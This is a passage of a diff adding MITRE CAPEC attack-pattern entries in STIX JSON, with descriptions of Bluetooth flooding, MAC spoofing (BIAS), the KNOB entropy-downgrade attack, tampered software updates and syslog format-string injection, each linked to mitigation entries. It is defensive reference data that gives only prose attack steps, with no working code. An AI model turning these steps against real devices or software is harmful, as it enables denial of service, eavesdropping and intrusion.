3.1 Type C interface with support for DP mode", + "id": "course-of-action--f2cc64b5-cdfa-4640-bb2f-f11ccbab73cc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5186383a-023d-4ef1-918a-0f11c9d14b4d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f2cc64b5-cdfa-4640-bb2f-f11ccbab73cc", + "spec_version": "2.1", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Set Security Level to SL3 for Thunderbolt 2 system port", + "id": "course-of-action--b322aa23-69d1-474e-82a2-1f71903f29a4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--25053510-6191-4eb9-928f-471d5618f597", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b322aa23-69d1-474e-82a2-1f71903f29a4", + "spec_version": "2.1", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable PCIe tunneling to set Security Level to SL3", + "id": "course-of-action--4dba3df8-f407-4d52-9881-92f01e7b5f77", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ae02655e-7790-4816-8ebd-c5291df0de36", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4dba3df8-f407-4d52-9881-92f01e7b5f77", + "spec_version": "2.1", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable Boot Camp upon MacOS systems", + "id": "course-of-action--c0bb9f6d-50f7-44ad-a3f9-116580f0424d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd286fbd-f1da-41de-9516-8d195eb182a9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c0bb9f6d-50f7-44ad-a3f9-116580f0424d", + "spec_version": "2.1", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses Bluetooth flooding to transfer large packets to Bluetooth enabled devices over the L2CAP protocol with the goal of creating a DoS. This attack must be carried out within close proximity to a Bluetooth enabled device.", + "external_references": [ + { + "external_id": "CAPEC-666", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/666.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "Network Denial of Service: Direct Network Flood", + "external_id": "T1498.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/001" + }, + { + "description": "Endpoint Denial of Service: OS Exhaustion Flood", + "external_id": "T1499.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/001" + }, + { + "description": "Amrita Mitra, What is BlueSmack Attack?, 2017--03---08, The Security Buddy", + "external_id": "REF-655", + "source_name": "reference_from_CAPEC", + "url": "https://www.thesecuritybuddy.com/bluetooth-security/what-is-bluesmack-attack/" + } + ], + "id": "attack-pattern--c3ce7043-a2cc-4686-945c-cf3b605b7c90", + "modified": "2022-09-29T00:00:00.000Z", + "name": "BlueSmacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Resource Consumption" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Scan for Bluetooth Enabled Devices: Using BlueZ along with an antenna, an adversary searches for devices with Bluetooth on.

    2. Techniques
    Note the MAC address of the device you want to attack.

Experiment

  1. Change L2CAP Packet Length: The adversary must change the L2CAP packet length to create packets that will overwhelm a Bluetooth enabled device.

    2. Techniques
    An adversary downloads and installs BlueZ, the standard Bluetooth utility package for Linux.

Exploit

  1. Flood: An adversary sends the packets to the target device, and floods it until performance is degraded.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system/application has Bluetooth enabled." + ], + "x_capec_skills_required": { + "Low": "An adversary only needs a Linux machine along with a Bluetooth adapter, which is extremely common." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disable Bluetooth when not being used.", + "id": "course-of-action--d5dcbac0-5e5f-43b5-bafd-3e3255fe84b2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-666-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5cf51b79-b6f1-4956-b6cc-c945dbe525c1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d5dcbac0-5e5f-43b5-bafd-3e3255fe84b2", + "spec_version": "2.1", + "target_ref": "attack-pattern--c3ce7043-a2cc-4686-945c-cf3b605b7c90", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When using Bluetooth, set it to hidden or non-discoverable mode.", + "id": "course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-666-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--80201cde-dfb2-4b73-bfb8-7f01b83d2d4f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c", + "spec_version": "2.1", + "target_ref": "attack-pattern--c3ce7043-a2cc-4686-945c-cf3b605b7c90", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary disguises the MAC address of their Bluetooth enabled device to one for which there exists an active and trusted connection and authenticates successfully. The adversary can then perform malicious actions on the target Bluetooth device depending on the target’s capabilities.", + "external_references": [ + { + "external_id": "CAPEC-667", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/667.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + } + ], + "id": "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Bluetooth Impersonation AttackS (BIAS)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Confidentiality": [], + "Integrity": [] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find disguise and target: The adversary starts the Bluetooth service on the attacking device and searches for nearby listening devices.

    2. Techniques
    Knowledge of a trusted MAC address.
    Scanning for devices other than the target that may be trusted.

Experiment

  1. Disguise: Using the MAC address of the device the adversary wants to impersonate, they may use a tool such as spooftooth or macchanger to spoof their Bluetooth address and attempt to authenticate with the target.

Exploit

  1. Use device capabilities to accomplish goal: Finally, if authenticated successfully the adversary can perform tasks/information gathering dependent on the target's capabilities and connections.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Knowledge of a target device's list of trusted connections." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be in close proximity to Bluetooth devices." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disable Bluetooth in public places.", + "id": "course-of-action--2d13642f-44e3-480c-b907-c2114df19379", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-667-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b477928d-f597-4e68-8812-a8bc335d9bfb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2d13642f-44e3-480c-b907-c2114df19379", + "spec_version": "2.1", + "target_ref": "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Verify incoming Bluetooth connections; do not automatically trust.", + "id": "course-of-action--c0001e8c-8758-4434-ba10-32c5b2334ce1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-667-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--51b85277-07df-4319-8d21-1fef2587765e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c0001e8c-8758-4434-ba10-32c5b2334ce1", + "spec_version": "2.1", + "target_ref": "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Change default PIN passwords and always use one when connecting.", + "id": "course-of-action--c56e3d38-c305-47a5-bdfa-bc5c1c578973", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-667-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8e6624f4-6e7b-4594-8b02-e56c9aca7173", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c56e3d38-c305-47a5-bdfa-bc5c1c578973", + "spec_version": "2.1", + "target_ref": "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary can exploit a flaw in Bluetooth key negotiation allowing them to decrypt information sent between two devices communicating via Bluetooth. The adversary uses an Adversary in the Middle setup to modify packets sent between the two devices during the authentication process, specifically the entropy bits. Knowledge of the number of entropy bits will allow the attacker to easily decrypt information passing over the line of communication.", + "external_references": [ + { + "external_id": "CAPEC-668", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/668.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Data Manipulation: Transmitted Data Manipulation", + "external_id": "T1565.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1565/002" + }, + { + "description": "Jovi Umawing, Bluetooth vulnerability can be exploited in Key Negotiation of Bluetooth (KNOB) attacks, 2019--08---21, MalwareBytes", + "external_id": "REF-657", + "source_name": "reference_from_CAPEC", + "url": "https://blog.malwarebytes.com/awareness/2019/08/bluetooth-vulnerability-can-be-exploited-in-key-negotiation-of-bluetooth-knob-attacks/" + } + ], + "id": "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Key Negotiation of Bluetooth Attack (KNOB)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f", + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Given users Alice, Bob and Charlie (Charlie being the attacker), Alice and Bob begin to agree on an encryption key when connecting. While Alice sends a message to Bob that an encryption key with 16 bytes of entropy should be used, Charlie changes this to 1 and forwards the request to Bob and continues forwarding these packets until authentication is successful." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Discovery: Using an established Person in the Middle setup, search for Bluetooth devices beginning the authentication process.

    2. Techniques
    Use packet capture tools.

Experiment

  1. Change the entropy bits: Upon recieving the initial key negotiation packet from the master, the adversary modifies the entropy bits requested to 1 to allow for easy decryption before it is forwarded.

Exploit

  1. Capture and decrypt data: Once the entropy of encryption is known, the adversary can capture data and then decrypt on their device.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Person in the Middle network setup." + ], + "x_capec_resources_required": [ + "Bluetooth adapter, packet capturing capabilities." + ], + "x_capec_skills_required": { + "Medium": "Ability to modify packets." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Newer Bluetooth firmwares ensure that the KNOB is not negotaited in plaintext. Update your device.", + "id": "course-of-action--c40ed234-cae5-4a4e-9080-d0b461edab63", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-668-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a7a3fb48-d2a9-46e6-b2e1-3e971c6ab1d9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c40ed234-cae5-4a4e-9080-d0b461edab63", + "spec_version": "2.1", + "target_ref": "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary with access to an organization’s software update infrastructure inserts malware into the content of an outgoing update to fielded systems where a wide range of malicious effects are possible. With the same level of access, the adversary can alter a software update to perform specific malicious acts including granting the adversary control over the software’s normal functionality.\n ", + "external_references": [ + { + "external_id": "CAPEC-669", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/669.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "Defending Against Software Supply Chain Attacks, 2021--04, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-658", + "source_name": "reference_from_CAPEC", + "url": "https://www.cisa.gov/sites/default/files/publications/defending_against_software_supply_chain_attacks_508_1.pdf" + }, + { + "description": "Dr. Charles Clancy, Joe Ferraro, Robert A. Martin, Adam G. Pennington, Christopher L. Sledjeski, Dr. Craig J. Wiener, Deliver Uncompromised: Securing Critical Software Supply Chains, 2021--01, The MITRE Corporation", + "external_id": "REF-659", + "source_name": "reference_from_CAPEC", + "url": "https://www.mitre.org/publications/technical-papers/deliver-uncompromised-securing-critical-software-supply-chains" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + } + ], + "id": "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Alteration of a Software Update", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--a7061d3b-6f93-440d-8b0d-4078e80eef88" + ], + "x_capec_child_of_refs": [ + "attack-pattern--582f33d6-0aa7-4f34-a91e-d767a65adad1" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "\n A subcontractor to a software developer injects maliciously altered software updates into an automated update process that distributes to government and commercial customers software containing a hidden backdoor.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify software with frequent updates: The adversary must first identify a target software that has updates at least with some frequency, enough that there is am update infrastructure.

Experiment

  1. Gain access to udpate infrastructure: The adversary must then gain access to the organization's software update infrastructure. This can either be done by gaining remote access from outside the organization, or by having a malicious actor inside the organization gain access. It is often easier if someone within the organization gains access.

Exploit

  1. Alter the software update: Through access to the software update infrastructure, an adversary will alter the software update by injecting malware into the content of an outgoing update.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An adversary would need to have penetrated an organization’s software update infrastructure including gaining access to components supporting the configuration management of software versions and updates related to the software maintenance of customer systems." + ], + "x_capec_skills_required": { + "High": "Skills required include the ability to infiltrate the organization’s software update infrastructure either from the Internet or from within the organization, including subcontractors, and be able to change software being delivered to customer/user systems in an undetected manner." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a Software Assurance Plan that includes maintaining strict configuration management control of source code, object code and software development, build and distribution tools; manual code reviews and static code analysis for developmental software; and tracking of all storage and movement of code.", + "id": "course-of-action--f7f5f2ab-7b9b-473b-9e09-91793b1951d8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-669-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b27d91b7-66f1-4a0d-a25b-c73cadad30b4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7f5f2ab-7b9b-473b-9e09-91793b1951d8", + "spec_version": "2.1", + "target_ref": "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Require elevated privileges for distribution of software and software updates.", + "id": "course-of-action--16492a56-a1ff-45ac-9d60-937a2b5faa49", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-669-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b3576f50-4c2f-4c57-855a-1f4b066ac7ea", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16492a56-a1ff-45ac-9d60-937a2b5faa49", + "spec_version": "2.1", + "target_ref": "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets applications and software that uses the syslog() function insecurely. If an application does not explicitely use a format string parameter in a call to syslog(), user input can be placed in the format string parameter leading to a format string injection attack. Adversaries can then inject malicious format string commands into the function call leading to a buffer overflow. There are many reported software vulnerabilities with the root cause being a misuse of the syslog() function.", + "external_references": [ + { + "external_id": "CAPEC-67", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/67.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-134", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/134.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "Format String", + "external_id": "06", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Format-String" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "scut, team teso, Exploiting Format String Vulnerabilities", + "external_id": "REF-503", + "source_name": "reference_from_CAPEC", + "url": "http://doc.bughunter.net/format-string/exploit-fs.html" + }, + { + "description": "Halvar Flake, Auditing binaries for security vulnerabilities", + "external_id": "REF-504", + "source_name": "reference_from_CAPEC", + "url": "http://www.blackhat.com/presentations/bh-europe-00/HalvarFlake/HalvarFlake.ppt" + }, + { + "description": "Fortify Taxonomy of Vulnerabilities, Fortify Software", + "external_id": "REF-505", + "source_name": "reference_from_CAPEC", + "url": "https://vulncat.hpefod.com/en" + }, + { + "description": "Syslog man page", + "external_id": "REF-506", + "source_name": "reference_from_CAPEC", + "url": "http://www.rt.com/man/syslog.3.html" + } + ], + "id": "attack-pattern--4cd18074-15c1-4206-8391-115685669623", + "modified": "2022-09-29T00:00:00.000Z", + "name": "String Format Overflow in syslog()", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "attack-pattern--cbabea0a-39ed-4a6f-b752-238fe8c730af" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_example_instances": [ + "Format string vulnerability in TraceEvent function for ntop before 2.1 allows remote adversaries to execute arbitrary code by causing format strings to be injected into calls to the syslog function, via (1) an HTTP GET request, (2) a user name in HTTP authentication, or (3) a password in HTTP authentication. See also: CVE-2002-0412" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. In this attack, adversaries look for applications that use syslog() incorrectly.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer. For each user-controllable input that the adversary suspects is vulnerable to format string injection, attempt to inject formatting characters such as %n, %s, etc.. The goal is to manipulate the string creation using these formatting characters.

    2. Techniques
    Inject probe payload which contains formatting characters (%s, %d, %n, etc.) through input parameters.

